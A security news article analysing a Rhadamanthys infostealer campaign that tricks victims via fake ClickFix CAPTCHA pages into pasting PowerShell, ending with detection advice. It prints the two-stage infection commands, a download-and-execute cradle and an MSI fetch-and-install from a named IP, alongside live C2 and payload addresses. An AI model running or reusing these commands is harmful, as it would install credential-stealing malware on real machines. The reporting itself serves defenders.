Rhadamanthys Infostealer Leveraging ClickFix Technique to Steal Login Credentials
Rhadamanthys first surfaced in 2022 as a modular stealer sold under the Malware-as-a-Service model, but its latest campaign shows how quickly it is innovating.
At the centre of the new wave is a booby-trapped CAPTCHA page dubbed ClickFix, which instructs victims to “verify” their session by pasting a PowerShell command.
Once executed, the command silently reaches out to hxxps://ypp-studio[.]com/update.txt
, turns off execution-policy safeguards and fetches the next-stage payload in memory—completely fileless until the final drop.
Dark Atlas analysts noted that the lure pages are hosted on freshly registered typosquats, often imitating YouTube Partner Studio or similar SaaS portals, and that the underlying infrastructure has migrated from the earlier 77.239.96.51/rh_0.9.0.exe
host to 62.60.226.74/PTRFHDGS.msi
.
This subtle shift breaks hard-coded IoCs used by many security tools while preserving the stealer’s delivery chain.
Campaign telemetry shows a significant uptick in infections across small-to-medium enterprises during June and early July 2025, with stolen browser cookies and cloud credentials appearing on dark-web markets within hours of compromise.
What makes ClickFix especially potent is its social-engineering layer. The CAPTCHA screen offers a fake sense of legitimacy while precisely guiding the victim to press Win + R, paste the command, and hit Enter.
That single action bypasses traditional e-mail gateway filters and avoids the macros most blue teams hunt for.
.webp)
By the time a user sees the reassuring “Verification complete!” pop-up, Rhadamanthys has already unpacked in the background and begun siphoning data to its C2 at 193.109.85.136
.
Infection Mechanism
The initial PowerShell command is heavily padded with hash symbols to evade string-based detectors, yet resolves into only two functional lines:-
# Stage 1 – clipboard payload
$u='hxxps://ypp-studio[.]com/update.txt'; (New-Object Net.WebClient).DownloadString($u) | iex
# Stage 2 – decoded from Stage 1
Invoke-WebRequest -Uri http://62.60.226.74/PTRFHDGS.msi -OutFile $env:AppData+'PTRFHDGS.msi';
Start-Process msiexec.exe -ArgumentList '/i', $env:AppData+'PTRFHDGS.msi';
Stage 1 lives only in memory; Stage 2 writes the MSI installer as PTRFHDGS.msi
, which drops rh_0.9.0.exe
and launches it with msiexec
so that parent/child correlations appear benign.
The executable immediately enumerates running processes, hunting for debuggers such as x64dbg.exe
, ida64.exe
, or ProcessHacker.exe
; if found, it terminates itself to frustrate analysis.
It follows with time-based anti-sandbox checks using QueryPerformanceCounter
, then injects into WerFault.exe
—a trusted Windows Error Reporting binary—to persist and exfiltrate.
A single TCP stream to the hard-coded IP carries compressed archives containing browser databases, crypto-wallet files and KeePass vaults.
.webp)
Screenshots captured via BitBlt
are appended, giving operators a real-time window into victim activity.
Since Rhadamanthys resolves its C2 by literal IP, DNS-layer defences see nothing, and encrypted TLS over port 443 blends seamlessly with normal traffic.
The ClickFix campaign underscores how effortlessly adversaries can fuse social engineering with low-friction LOLBins to bypass layered defences.
Updating signature-based rules to include execution-policy bypasses, monitoring child processes of msiexec.exe
, and alerting on clipboard-sourced PowerShell are immediate steps defenders should consider.
Yet the broader lesson is behavioural: any “verification” prompt that asks users to run code is suspect—especially when the only thing it fixes is the attacker’s foothold.
Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -> Try ANY.RUN now
Source link